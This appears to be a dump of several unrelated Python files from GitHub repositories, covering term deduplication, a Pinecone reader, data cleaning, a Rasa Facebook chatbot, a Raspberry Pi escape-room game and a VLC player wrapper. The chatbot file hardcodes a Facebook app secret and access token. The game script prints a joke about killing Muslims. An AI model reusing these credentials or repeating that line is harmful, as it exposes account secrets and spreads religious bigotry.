[(i+j,i,index2term[i],index2term[i+j],len(index2term[i]),len(index2term[i+j]),threshold,DIST,) for j in range(1,window+1) if not (index2term[i+j],index2term[i],) in compared];\n if len(T) > _batch2:\n compared |= set([(index2term[ij],index2term[i],) for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T]);\n tasks.put(T);\n T = [];\n if len(T) != 0:\n tasks.put(T);\n workers = [MP.Process(target=get_similarity_normed,args=(tasks,results,x,)) for x in range(_jobs2)];\n for worker in workers:\n worker.start();\n for x in range(_jobs2):\n result = results.get();\n replacements |= result;\n #print 'Got result', x;\n for x in range(len(workers)):\n workers[x].join();\n #print 'Joined worker', x;\n return replacements, compared;\n\ndef get_similarity_normed(tasks,results,x):\n replacements = set([]);\n while True:\n print(x,'says: Approximate number of jobs in queue:', tasks.qsize());\n try:\n T = tasks.get(timeout=3);\n #print x,'says: Got', len(T), 'tasks to do...';\n except:\n break;\n for ij,i,term_i,term_ij,len_1,len_2,threshold,DIST in T:\n percent = similarity_normed(term_i,term_ij,len_1,len_2,DIST);\n if percent > threshold:\n replacements.add((ij,i,percent,));\n #print x,'says: Done with this set of tasks.';\n #print 'Closing job', x;\n results.put(replacements);\n return 0;\n\ndef 
prefix_normed(term1,term2,len_1,len_2):\n prefix = os.path.commonprefix([term1,term2]);\n is_prefix = len(prefix)==min([len_1,len_2]);\n return float(len(prefix))/max([len_1,len_2]) if is_prefix else 0.0;\n\ndef is_prefix(term1,term2):\n return term1 == term2[:len(term1)];\n\ndef make_affixes(terms,lookback=10000):\n prefixed = {terms[0]:[(terms[0],0,)]};\n for i in range(len(terms)-1):\n affixes = [];\n pointer = 0;\n for prefix,interval in prefixed[terms[i]]: # and len(terms[i+1])-(pointer+len(prefix)) > 1\n if len(prefix) >= 2 and interval < lookback and is_prefix(prefix,terms[i+1][pointer:]): # reusing previous prefix\n affixes += [(prefix,interval+1,)];\n pointer += len(prefix);\n else:\n break;\n affixes += [(terms[i+1][pointer:],0,)]; # new prefix\n prefixed[terms[i+1]] = affixes;\n return prefixed;\n\ndef similarity_normed(term1,term2,len_1,len_2,DIST):\n distance = damerau_dist(term1,term2) if DIST=='damerau' else edit_dist(term1,term2);\n return 1.-(float(distance)/max([len_1,len_2]));\n\ndef edit_dist(s1,s2):\n if len(s1) > len(s2):\n s1, s2 = s2, s1;\n distances = list(range(len(s1) + 1));\n for i2, c2 in enumerate(s2):\n distances_ = [i2+1];\n for i1, c1 in enumerate(s1):\n if c1 == c2:\n distances_.append(distances[i1]);\n else:\n distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])));\n distances = distances_;\n return distances[-1];\n\ndef damerau_dist(s1,s2):\n oneago = None;\n thisrow = list(range(1,len(s2)+1))+[0];\n for x in range(len(s1)):\n twoago, oneago, thisrow = oneago, thisrow, [0]*len(s2)+[x + 1];\n for y in range(len(s2)):\n delcost = oneago[y] + 1;\n addcost = thisrow[y-1] + 1;\n subcost = oneago[y-1] + (s1[x]!=s2[y]);\n thisrow[y] = min(delcost,addcost,subcost);\n if (x>0 and y>0 and s1[x]==s2[y-1] and s1[x-1]==s2[y] and s1[x]!=s2[y]):\n thisrow[y] = min(thisrow[y],twoago[y-2]+1);\n return thisrow[len(s2)-1];\n\ndef all_partitions(seq):\n for cutpoints in range(1 << (len(seq)-1)):\n result = []\n lastcut = 0\n for i in range(len(seq)-1):\n if (1< max_score:\n max_score = score;\n max_part = [''.join(partition) for partition in partitioning];\n return max_part;\n\ndef get_replacements(index2term,term2index):\n term2index_ = copy(term2index);\n replace = dict();\n sim_prefix = dict();\n sim_similar = dict();\n num_replace = 99;\n compared = set();\n while num_replace > 0:\n print(1);\n replace_prefix = replace_by_prefix( terms,_threshold_prefix,_window_prefix);\n print(2);\n replace_similar, compared = replace_by_similar(terms,_threshold_similar,_window_similar,_distance,compared);\n #replace_edit = replace_by_similar(terms,_threshold_similar,_window_similar,'edit');\n print(3);\n replace_new = apply_replace(terms,replace_prefix|replace_similar);\n print(4);\n num_replace = len(replace_new);\n print(5);\n only_prefix = [(terms[pair[0]],terms[pair[1]],) for pair in replace_prefix-replace_similar];\n #only_damerau = [(terms[pair[0]],terms[pair[1]],) for pair in replace_similar-replace_edit];\n print(6);\n replace.update(replace_new);\n print(7);\n terms = sorted(list(set([replace[term] if term in replace else term for term in terms])));\n print(8);\n term2index_ = {terms[i]:i for i in range(len(terms))};\n print(num_replace, '(',len(only_prefix),len(compared),')');#, '(',len(only_damerau),')';\n return replace;\n\ndef make_phrases(tree,tree_inv):\n #-------------------------------------------------------------------------------------\n #-right-min-left-min------------------------------------------------------------------\n set_std = 
set(probs_leq(_and_p_,_and_c_,tree));\n set_inv = set([tuple(reversed(el)) for el in probs_leq(_and_p_,_and_c_,tree_inv)]);\n inter = set_std & set_inv;\n #-------------------------------------------------------------------------------------\n #-right-certain-left-min--------------------------------------------------------------\n set_std_ = set(probs_leq(1.0,_or_c_,tree));\n set_inv_ = set([tuple(reversed(el)) for el in probs_leq(_or_p_,_or_c_,tree_inv)]);\n inter_ = set_std_ & set_inv_;\n #-left-certain-right-min--------------------------------------------------------------\n #-------------------------------------------------------------------------------------\n set_std__ = set(probs_leq(_or_p_,_or_c_,tree));\n set_inv__ = set([tuple(reversed(el)) for el in probs_leq(1.0,_or_c_,tree_inv)]);\n inter__ = set_std__ & set_inv__;\n #-------------------------------------------------------------------------------------\n union = inter | inter_ | inter__;\n #-------------------------------------------------------------------------------------\n #print(union);\n #print(len(inter), '+', len(inter_), '->', len(inter|inter_), '+', len(inter__), '->', len(union));\n return inter, inter_, inter__, union;\n\ndef merge_affixes(affixes_of,inter,inter_,inter__,union):\n affixes_of_ = dict();\n count = 0;\n for term in affixes_of:\n count += 1;\n if count % 1000000 == 0:\n print(count);#break;\n affixes_of_[term] = [];\n current = affixes_of[term][0][0];\n for i in range(len(affixes_of[term])):\n if i == len(affixes_of[term])-1:\n affixes_of_[term] += [current];\n elif not (affixes_of[term][i][0],affixes_of[term][i+1][0],) in union:\n current += affixes_of[term][i+1][0];\n else:\n affixes_of_[term] += [current];\n current = affixes_of[term][i+1][0];\n #print(affixes_of_[term]);\n return affixes_of_;\n\ndef combine_affixes(a,b): #Unfortunately, the result makes no sense either\n a = copy(a); b = copy(b);\n for i in range(len(a)):\n if a[i].endswith('-'):\n a[i] = a[i][:-1];\n for i in range(len(b)):\n if b[i].endswith('-'):\n b[i] = b[i][:-1];\n if len(a[0]) > len(b[0]):\n z = a; a = b; b = z;\n c = [''];\n while len(a) > 0 and len(b) > 0:\n if len(a[0]) > len(b[0]):\n z = a; a = b; b = z; #switch\n c += [a[0]]; #append shorter\n #c[-1] += a[0];\n b[0] = b[0][len(a[0]):]; #shorten longer\n a = a[1:]; #remove shorter\n c += ['']; #start new\n else:\n c[-1] += a[0]; #concatenate shorter\n b[0] = b[0][len(a[0]):]; #shorten longer\n a = a[1:]; #remove shorter\n return [el for el in c if el != ''];\n\ndef show_affixes(term,terms,term2index,affixes_of,affixes_of_inv): #TODO: Not right yet and consider: alt lakonisches vs. 
altlakonisc hes\n for term in terms[term2index[term]-4:term2index[term]+5]:\n a = [affix[0] for affix in affixes_of [term ]];\n b = [affix[0][::-1] for affix in affixes_of_inv[term[::-1]]][::-1];\n c = combine_affixes(a,b);\n print(' '.join(a)); print(' '.join(b)); print(' '.join(c));\n print('.................................................');\n\ndef sort_terms(terms):\n fmodel = fasttext.load_model(_model);\n lang2terms = defaultdict(list);\n for i in range(len(terms)):\n lang2terms[fmodel.predict(terms[i])[0][0][9:]].append(terms[i]);\n if i % 500000 == 0:\n print(i);\n return lang2terms;\n\nIN = open(_termfile);\nterms = [line.rstrip().strip() for line in IN];\nIN.close();\nindex2term = copy(terms);\nterm2index = {terms[i]:i for i in range(len(terms))};\nlang2terms = sort_terms(terms);\nlerm2index = {lang:{lang2terms[lang][i]:i for i in range(len(lang2terms[lang]))} for lang in lang2terms};\n\ninput('Press ENTER to continue...')\n\naffixes_of = {lang:dict() for lang in lang2terms};\nfor lang in lang2terms:\n affixes_of[lang] = make_affixes(lang2terms[lang],10000);\n\ninput('Press ENTER to continue...')\n\naffixes_of_inv = {lang:dict() for lang in lang2terms};\nfor lang in lang2terms:\n affixes_of_inv[lang] = make_affixes(sorted([term[::-1] for term in lang2terms[lang]]),10000);\n\ninput('Press ENTER to continue...')\n\nagrams = ([(affixes_of[term][i][0],affixes_of[term][i+1][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][-1][0],None,)] if len(affixes_of[term])>=2 else [(affixes_of[term][-1][0],None,)] for term in affixes_of);\nagrams = [gram for grams in agrams for gram in grams];\nzgrams = ([(affixes_of[term][i+1][0],affixes_of[term][i][0],) for i in range(len(affixes_of[term])-1)]+[(affixes_of[term][0][0],None,)] if len(affixes_of[term])>=2 else [(affixes_of[term][0][0],None,)] for term in affixes_of);\nzgrams = [gram for grams in zgrams for gram in grams];\n\ninput('Press ENTER to continue...')\n\ntree = make_tree(Counter(agrams));\ntree_inv = make_tree(Counter(zgrams));\n\ninput('Press ENTER to continue...')\n\ninter, inter_, inter__, union = make_phrases(tree,tree_inv);\n\ninput('Press ENTER to continue...')\n\naffixes_of_ = merge_affixes(affixes_of,inter,inter_,inter__,union);\n\ninput('Press ENTER to continue...')\n\nfor term in terms[2879500:2879550]:\n print(' '.join((affix[0] for affix in affixes_of [term])));\n print(' '.join((affix for affix in affixes_of_[term])));\n print('................................................');\n\n\n","repo_name":"tobackes/pubdedup","sub_path":"code/split_affixes.py","file_name":"split_affixes.py","file_ext":"py","file_size_in_byte":16198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29537954952","text":"\"\"\"Pinecone reader.\"\"\"\n\nfrom typing import Any, Dict, List, Optional\n\nfrom llama_index.readers.base import BaseReader\nfrom llama_index.schema import Document\n\n\nclass PineconeReader(BaseReader):\n \"\"\"Pinecone reader.\n\n Args:\n api_key (str): Pinecone API key.\n environment (str): Pinecone environment.\n \"\"\"\n\n def __init__(self, api_key: str, environment: str):\n \"\"\"Initialize with parameters.\"\"\"\n try:\n import pinecone\n except ImportError:\n raise ImportError(\n \"`pinecone` package not found, please run `pip install pinecone-client`\"\n )\n\n self._api_key = api_key\n self._environment = environment\n pinecone.init(api_key=api_key, environment=environment)\n\n def load_data(\n self,\n index_name: str,\n id_to_text_map: Dict[str, 
str],\n vector: Optional[List[float]],\n top_k: int,\n separate_documents: bool = True,\n include_values: bool = True,\n **query_kwargs: Any\n ) -> List[Document]:\n \"\"\"Load data from Pinecone.\n\n Args:\n index_name (str): Name of the index.\n id_to_text_map (Dict[str, str]): A map from ID's to text.\n separate_documents (Optional[bool]): Whether to return separate\n documents per retrieved entry. Defaults to True.\n vector (List[float]): Query vector.\n top_k (int): Number of results to return.\n include_values (bool): Whether to include the embedding in the response.\n Defaults to True.\n **query_kwargs: Keyword arguments to pass to the query.\n Arguments are the exact same as those found in\n Pinecone's reference documentation for the\n query method.\n\n Returns:\n List[Document]: A list of documents.\n \"\"\"\n import pinecone\n\n index = pinecone.Index(index_name)\n if \"include_values\" not in query_kwargs:\n query_kwargs[\"include_values\"] = True\n response = index.query(top_k=top_k, vector=vector, **query_kwargs)\n\n documents = []\n for match in response.matches:\n if match.id not in id_to_text_map:\n raise ValueError(\"ID not found in id_to_text_map.\")\n text = id_to_text_map[match.id]\n embedding = match.values\n if len(embedding) == 0:\n embedding = None\n documents.append(Document(text=text, embedding=embedding))\n\n if not separate_documents:\n text_list = [doc.get_content() for doc in documents]\n text = \"\\n\\n\".join(text_list)\n documents = [Document(text=text)]\n\n return documents\n","repo_name":"run-llama/llama_index","sub_path":"llama_index/readers/pinecone.py","file_name":"pinecone.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":23993,"dataset":"github-code","pt":"45"} +{"seq_id":"42868293056","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 20:09:33 2018\n\n@author: madeline\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom pprint import pprint\nimport csv\nimport cleaning_score_fantasy\n\n\n#read data in\nif __name__ == '__main___':\n\n fantasy_data = pd.read_csv('data\\\\fantasy-data.csv', sep=',', encoding='latin1')\n \n #replace all NAN values (numerical) with true zeroes, since these values\n #are true zeroes\n def clean_int_fan_null(data_frame):\n numeric_attributes = data_frame.columns.tolist()\n non_numeric_list = data_frame.select_dtypes(include=['object']).columns.tolist()\n for item in non_numeric_list:\n numeric_attributes.remove(item)\n \n for item in numeric_attributes:\n data_frame[item].fillna(0, inplace = True)\n return(data_frame)\n \n #remove rows with defensive data aka DST because we are only predicting offensive data \n def clean_fan_position(data_frame):\n offense_data_frame = data_frame[data_frame['Position'].str.len() <= 2]\n return(offense_data_frame)\n \n #remove duplicate rows \n def drop_fan_duplicates(data_frame):\n data_frame.drop_duplicates()\n return(data_frame)\n \n #run cleaning score again\n def fantasy_clean_process(data_frame):\n #run all cleaning functions\n print('running cleaning score...')\n clean_fan_score(data_frame)\n \n print('cleaning ....')\n #drop duplicates\n no_dup = drop_fan_duplicates(data_frame)\n \n #drop defensive positions\n no_def = clean_fan_position(no_dup)\n \n #fill nAns with true zeroes\n final_clean = clean_int_fan_null(no_def)\n \n print('re-running cleaning score... 
')\n clean_fan_score(final_clean)\n \n return(final_clean)\n \n #run total process \n fantasy_clean_process(fantasy_data)","repo_name":"madelinenlee/COSC587","sub_path":"fantasy_data_cleaning.py","file_name":"fantasy_data_cleaning.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"29310055521","text":"#list of numbers\nlist1=[10,21,4,15,66,93,1]\neven_count, odd_count =0, 0\n#iterating each number in list\nfor num in list1:\n if num % 2 == 0:\n even_count += 1\n else:\n odd_count += 1\nprint(\"Even numbers in the list: \", even_count) \nprint(\"Odd numbers in the list: \", odd_count)\n\n\n\nmaximum=max(list1)\nprint(maximum)\n\nminimum=min(list1)\nprint(minimum)\n\n\n\n\n\n\n\n# Python program to count and \n# print all palindrome numbers in a list. \n \ndef palindromeNumbers(list_a): \n \n c = 0\n \n # loop till list is not empty \n for i in list_a: \n \n # Find reverse of current number \n t = i \n rev = 0\n while t > 0: \n rev = rev * 10 + t % 10\n t = t // 10\n \n # compare rev with the current number \n if rev == i: \n print (i) \n c = c + 1\n \n print()\n print (\"Total palindrome nos. are\", c )\n print()\n \n# Driver code \ndef main(): \n \n list_a = [10, 121, 133, 155, 141, 252] \n palindromeNumbers(list_a) \n \n list_b = [ 111, 220, 784, 565, 498, 787, 363] \n palindromeNumbers(list_b) \n \nif __name__==\"__main__\": \n main() # main function call ","repo_name":"jyotshna-24/day-4","sub_path":"main (4).py","file_name":"main (4).py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"20552219917","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\nimport warnings\n\nfrom rasa_core import __version__ as rasa_core_version\nfrom rasa_core import utils\nfrom rasa_core.agent import Agent\nfrom rasa_core.channels.console import ConsoleInputChannel\nfrom rasa_core.interpreter import RasaNLUInterpreter\nfrom rasa_core.policies.keras_policy import KerasPolicy\nfrom rasa_core.policies.memoization import MemoizationPolicy\nfrom rasa_core.channels import HttpInputChannel\nfrom rasa_core.channels.facebook import FacebookInput\n\nlogger = logging.getLogger(__name__)\n\ndef train_dialogue(domain_file=\"domain.yml\",\n model_path=\"models/dialogue\",\n training_data_file=\"data/stories.md\"):\n\n agent = Agent(domain_file,\n policies=[MemoizationPolicy(), KerasPolicy()])\n\n agent.train(\n training_data_file,\n max_history=3,\n epochs=1000,\n batch_size=50,\n augmentation_factor=50,\n validation_split=0.2\n )\n\n agent.persist(model_path)\n return agent\n\n\ndef train_nlu():\n from rasa_nlu.converters import load_data\n from rasa_nlu.config import RasaNLUConfig\n from rasa_nlu.model import Trainer\n\n training_data = load_data('data/nlu.json')\n trainer = Trainer(RasaNLUConfig(\"nlu_config.json\"))\n trainer.train(training_data)\n model_directory = trainer.persist('models/nlu/', fixed_model_name=\"current\")\n\n return model_directory\n\ndef run(serve_forever=True):\n interpreter = RasaNLUInterpreter(\"models/nlu/default/current\")\n agent = Agent.load(\"models/dialogue\", interpreter=interpreter)\n\n fb_verify = 'fractal'\n fb_secret = '3db0452e1e4b787d3058e14c624839bc'\n\n fb_tokens = {\n '162871184345992': 
'EAAbctRsA3XkBAPeTSd4Q7SKuL0YvINDj30xYquxZC0tJfIZCCzahlDP78D63cTNqpIOQfmeWrnq2B1EFjtf5LHWA7UUQq4imZBSueYtZADcWZARxNWU1kj1SL5dVIn7nxZAj9wZCWmVOZCIkwwU4itzSzu1ZBU41vZC9GJrvbG75i0S5aO7rAYexwt',\n }\n\n input_channel = FacebookInput(\n fb_verify,\n fb_secret,\n fb_tokens,\n True\n )\n\n if serve_forever:\n agent.handle_channel(HttpInputChannel(5000, '/app', input_channel))\n return agent\n\n\nif __name__ == '__main__':\n # utils.configure_colored_logging(loglevel=\"DEBUG\")\n try:\n parser = argparse.ArgumentParser(description='starts the bot')\n\n parser.add_argument(\n 'task',\n choices=[\"train-nlu\", \"train-dialogue\", \"run\"],\n help=\"what the bot should do - e.g. run or train?\")\n task = parser.parse_args().task\n\n # decide what to do based on first parameter of the script\n if task == \"train-nlu\":\n train_nlu()\n elif task == \"train-dialogue\":\n train_dialogue()\n elif task == \"run\":\n run()\n else:\n warnings.warn(\"Need to pass either 'train-nlu', 'train-dialogue' or \"\n \"'run' to use the script.\")\n exit(1)\n except KeyboardInterrupt:\n exit(1)\n","repo_name":"udayallu/rasa-core-ex","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"22875952123","text":"#!/usr/bin/env python2\n\nimport OSC\nimport time\nimport RPi.GPIO as g\nimport multiprocessing as mp\n\nfrom time import sleep\nfrom OSC import OSCServer\n\nfrom pygame import mixer as m\n\nIP = '192.168.0.8'\nPORT = 8000\nc = OSC.OSCClient()\nc.connect((IP, PORT))\n\ng.setmode(g.BOARD)\ng.setwarnings(False)\nMATRIX = [[1, 2, 3, 'A'],\n [4, 5, 6, 'B'],\n [7, 8, 9, 'C'],\n ['*', 0, '#', 'D']]\n\n\nROW = [7, 11, 13, 15]\nCOL = [12, 16, 18, 22]\nCODE = '793'\n\n\nLOCK = 37\nPOWER = 38\nBUTTON = 40\nBUTTONLIGHT = 8\nRADIORELAY = 26\ng.setup(POWER, g.IN, pull_up_down=g.PUD_UP)\ng.setup(LOCK, g.IN, pull_up_down=g.PUD_UP)\ng.setup(BUTTON, g.IN, pull_up_down=g.PUD_UP)\ng.setup(RADIORELAY, g.OUT)\ng.setup(BUTTONLIGHT, g.OUT)\ng.output(BUTTONLIGHT, 1)\ng.output(RADIORELAY, 1)\n\nfor j in range(4):\n g.setup(COL[j], g.OUT)\n g.output(COL[j], 1)\n\nfor i in range(4):\n g.setup(ROW[i], g.IN, pull_up_down=g.PUD_UP)\n\nm.init()\nm.music.load(\"sixniner.mp3\")\n\n\ndef osc_set_reset(address):\n m = OSC.OSCMessage()\n m.setAddress(address)\n m.append(1)\n c.send(m)\n time.sleep(1)\n m = OSC.OSCMessage()\n m.setAddress(address)\n m.append(0)\n c.send(m)\n\n\ndef check(str):\n print('checking: {}'.format(str))\n if len(str) >= len(CODE):\n # print('greater: {}, {}'.format(str[-4:-1], CODE))\n if str[-len(CODE):] == CODE:\n print(\"you did the code!\")\n osc_set_reset('/droneGame/push4')\n return True\n\n\n\ndef keypad(gameState):\n foo = ''\n while (gameState == gamePosition):\n for j in range(4):\n g.output(COL[j], 0)\n\n for i in range(4):\n if g.input(ROW[i]) == 0:\n print(MATRIX[i][j])\n if MATRIX[i][j] == 0:\n print(\"ZERO!\")\n if check(foo):\n gameState = gamePositionList[gamePositionList.index(gameState) + 1]\n foo += str((MATRIX[i][j]))\n while(g.input(ROW[i]) == 0):\n pass\n g.output(COL[j], 1)\n\ndef switch_test(inputNum, gameState):\n state = ''\n newstate = state\n while (gameState == gamePosition):\n if g.input(inputNum) == 0:\n newstate = gameState+'_on'\n if state != newstate:\n state = newstate\n print('state change: {}'.format(state))\n gameState = 'X'\n else:\n newstate = gameState+'_off'\n if state != newstate:\n state = newstate\n print('state change: 
{}'.format(state))\n\n\nclass BlinkHandler(object):\n def __init__(self, section):\n pin_dict = {'power': {'green': 5, 'red': 3, 'status': 'off'},\n 'key': {'green': 24, 'red': 23, 'status': 'off'},\n 'numpad': {'green': 32, 'red': 31, 'status': 'off'},\n 'button': {'green': 36, 'red': 35, 'status': 'off'}}\n self.ledIndicator = pin_dict[section]\n self.procs = []\n self.event = mp.Event()\n for pin in (self.ledIndicator['green'], self.ledIndicator['red']):\n g.setup(pin, g.OUT)\n g.output(pin, 1)\n\n\n\n def _redBlink(self, blinkPin):\n while not self.event.is_set():\n g.output(blinkPin, 0)\n time.sleep(.25)\n g.output(blinkPin, 1)\n time.sleep(.25)\n\n def _soldGreen(self, blinkPin):\n g.output(blinkPin, 0)\n\n def _off(self, blinkPin):\n g.output(blinkPin, 1)\n\n def updatePreviousState(self):\n if self.ledIndicator['status'] == 'green':\n self._off(self.ledIndicator['green'])\n elif self.ledIndicator['status'] == 'red':\n self.event.set()\n for p in self.procs:\n p.join()\n self.event.clear()\n\n def changeState(self, state):\n self.updatePreviousState()\n if state == 'green':\n self._soldGreen(self.ledIndicator['green'])\n self.ledIndicator['status'] = 'green'\n elif state == 'red':\n x = mp.Process(target=(self._redBlink), args=(self.ledIndicator['red'],))\n x.start()\n self.procs.append(x)\n self.ledIndicator['status'] = 'red'\n elif state == 'off':\n self.event.set()\n for p in self.procs:\n p.join()\n self.event.clear()\n self._off(self.ledIndicator['red'])\n self._off(self.ledIndicator['green'])\n\n# end blinkHandler\n\n\nfoo = ''\nstate = ''\nnewState = state\npstate = ''\nnewPstate = pstate\ngamePositionList = ['start', 'powerCabled', 'keyInserted', 'radioCalled',\n 'keypadEntered', 'buttonPushed']\ngamePosition = gamePositionList[0]\n\n\npowerLed = BlinkHandler('power')\nkeyLed = BlinkHandler('key')\nnumLed = BlinkHandler('numpad')\nbuttonLed = BlinkHandler('button')\n\n\n\n### server ###\nserver = OSCServer( (\"0.0.0.0\", 8888) )\nserver.timeout = 0\n\n\ndef handle_timeout(self):\n self.timed_out = True\n\ndef cb(path, tags, args, source):\n if args[0] == 1:\n gamePosition = 'start'\n print('game position is now start!')\n try:\n powerLed.changeState('off')\n keyLed.changeState('off')\n numLed.changeState('off')\n buttonLed.changeState('off')\n print(\"reset game postion: {}\".format(gamePosition))\n except Exception as e:\n print('that didna work')\n print(e)\n print(path, tags, args, source)\n\ndef nothing(*args):\n pass\n\nserver.addMsgHandler(\"/yes/please\", cb)\nserver.addMsgHandler(\"/yes/no\", nothing)\n\ndef each_frame():\n server.timed_out = False\n while not server.timed_out:\n server.handle_request()\n\n\ndef run():\n sleep(1)\n each_frame()\n\nt = mp.Process(target=run, args=())\nt.start()\n\n### end server\n\n\ntry:\n while True:\n\n if gamePosition == 'start':\n print('hello I am start')\n # powerLed = BlinkHandler('power')\n powerLed.changeState('red')\n switch_test(POWER, gamePosition)\n powerLed.changeState('green')\n osc_set_reset('/droneGame/push2')\n gamePosition = gamePositionList[1]\n print('foo: {}'.format(gamePosition))\n elif gamePosition == 'powerCabled':\n # keyLed = BlinkHandler('key')\n keyLed.changeState('red')\n switch_test(LOCK, gamePosition)\n keyLed.changeState('green')\n osc_set_reset('/droneGame/push3')\n gamePosition = gamePositionList[2]\n elif gamePosition == 'keyInserted':\n # numLed = BlinkHandler('numpad')\n numLed.changeState('red')\n print(\"radio?\")\n g.output(RADIORELAY, 0)\n m.music.play(loops=-1)\n keypad(gamePosition)\n 
numLed.changeState('green')\n m.music.stop()\n g.output(RADIORELAY, 1)\n print('and then???')\n gamePosition = 'keypadEntered'\n\n ### deal with radio here\n\n elif gamePosition == 'keypadEntered':\n # buttonLed = BlinkHandler('button')\n buttonLed.changeState('red')\n g.output(BUTTONLIGHT, 0)\n print(\"Button status: {}\".format(g.input(BUTTON)))\n switch_test(BUTTON, gamePosition)\n print(\"buttoned?\")\n buttonLed.changeState('green')\n g.output(BUTTONLIGHT, 1)\n osc_set_reset('/droneGame/push5')\n gamePosition = 'XXX'\n print('missle launched muslims destroyed\\ncongratulations you are racist!!')\n\nexcept KeyboardInterrupt as e:\n osc_set_reset('/4toggles/push8')\n print(\"fml: {}\".format(e))\n g.cleanup()\n","repo_name":"jerkmuffin/AmazonDroneFiles","sub_path":"droneMachine.py","file_name":"droneMachine.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38934644185","text":"from letmedoit import config\nimport os, sys, re, platform, subprocess\nfrom letmedoit.utils.shared_utils import SharedUtil\n\nclass VlcUtil:\n\n macVlc = windowsVlc = \"\"\n\n @staticmethod\n def isVlcPlayerInstalled():\n # on macOS\n macVlc = \"/Applications/VLC.app/Contents/MacOS/VLC\"\n VlcUtil.macVlc = macVlc if platform.system() == \"Darwin\" and os.path.isfile(macVlc) else \"\"\n # on Windows\n windowsVlc = r'C:\\Program Files\\VideoLAN\\VLC\\vlc.exe'\n if platform.system() == \"Windows\":\n if os.path.isfile(windowsVlc):\n VlcUtil.windowsVlc = windowsVlc\n elif SharedUtil.isPackageInstalled(\"vlc\"):\n # Windows users can install vlc command with scoop\n # read: https://github.com/ScoopInstaller/Scoop\n # instll scoop\n # > iwr -useb get.scoop.sh | iex\n # > scoop install aria2\n # install vlc\n # > scoop bucket add extras\n # > scoop install vlc\n VlcUtil.windowsVlc = \"vlc\"\n else:\n VlcUtil.windowsVlc = \"\"\n if (VlcUtil.macVlc or VlcUtil.windowsVlc or SharedUtil.isPackageInstalled(\"vlc\")):\n return True\n else:\n return False\n\n @staticmethod\n def openVlcPlayer():\n def run(command):\n os.system(\"{0}{1} > /dev/null 2>&1 &\".format(\"nohup \" if SharedUtil.isPackageInstalled(\"nohup\") else \"\", command))\n VlcUtil.closeVlcPlayer()\n try:\n if VlcUtil.windowsVlc:\n os.system(VlcUtil.windowsVlc)\n elif VlcUtil.macVlc:\n run(VlcUtil.macVlc)\n elif SharedUtil.isPackageInstalled(\"vlc\"):\n run(\"vlc\")\n except:\n print(\"No VLC player is found!\")\n\n @staticmethod\n def closeVlcPlayer():\n try:\n if platform.system() == \"Windows\":\n os.system(\"taskkill /IM vlc.exe /F\")\n else:\n os.system(\"pkill VLC\")\n os.system(\"pkill vlc\")\n except:\n pass\n\n @staticmethod\n def playMediaFile(filePath, vlcSpeed=None, audioGui=False):\n if vlcSpeed is None:\n vlcSpeed = config.vlcSpeed\n # get full path and escape double quote\n if isinstance(filePath, str):\n filePath = os.path.abspath(filePath).replace('\"', '\\\\\"')\n else:\n # when filePath is a list\n filePath = [os.path.abspath(i).replace('\"', '\\\\\"') for i in filePath]\n filePath = '\" \"'.join(filePath)\n VlcUtil.playMediaFileVlcGui(filePath, vlcSpeed) if re.search(\"(.mp4|.avi)$\", filePath.lower()[-4:]) or audioGui else VlcUtil.playMediaFileVlcNoGui(filePath, vlcSpeed)\n\n # play audio file with vlc without gui\n @staticmethod\n def playMediaFileVlcNoGui(filePath, vlcSpeed=None):\n if vlcSpeed is None:\n vlcSpeed = config.vlcSpeed\n # vlc on macOS\n if VlcUtil.macVlc:\n command = f'''{VlcUtil.macVlc} --intf rc --play-and-exit --rate 
{vlcSpeed} \"{filePath}\" &> /dev/null'''\n # vlc on windows\n elif VlcUtil.windowsVlc:\n command = f'''\"{VlcUtil.windowsVlc}\" --intf dummy --play-and-exit --rate {vlcSpeed} \"{filePath}\"'''\n # vlc on other platforms\n elif SharedUtil.isPackageInstalled(\"cvlc\"):\n command = f'''cvlc --play-and-exit --rate {vlcSpeed} \"{filePath}\" &> /dev/null'''\n # use .communicate() to wait for the playback to be completed as .wait() or checking pid existence does not work\n subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n\n\n # play video file with vlc with gui\n @staticmethod\n def playMediaFileVlcGui(filePath, vlcSpeed):\n # vlc on macOS\n if VlcUtil.macVlc:\n command = f'''{VlcUtil.macVlc} --play-and-exit --rate {vlcSpeed} \"{filePath}\" &> /dev/null'''\n # vlc on windows\n elif VlcUtil.windowsVlc:\n command = f'''\"{VlcUtil.windowsVlc}\" --play-and-exit --rate {vlcSpeed} \"{filePath}\"'''\n # vlc on other platforms\n elif SharedUtil.isPackageInstalled(\"vlc\"):\n command = f'''vlc --play-and-exit --rate {vlcSpeed} \"{filePath}\" &> /dev/null'''\n # use .communicate() to wait for the playback to be completed as .wait() or checking pid existence does not work\n subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n\nif __name__ == '__main__':\n speed = float(sys.argv[1])\n audioFile = \" \".join(sys.argv[2:])\n VlcUtil.playMediaFile(audioFile, speed)\n isVlcPlaying = os.path.join(\"temp\", \"isVlcPlaying\")\n if os.path.isfile(isVlcPlaying):\n 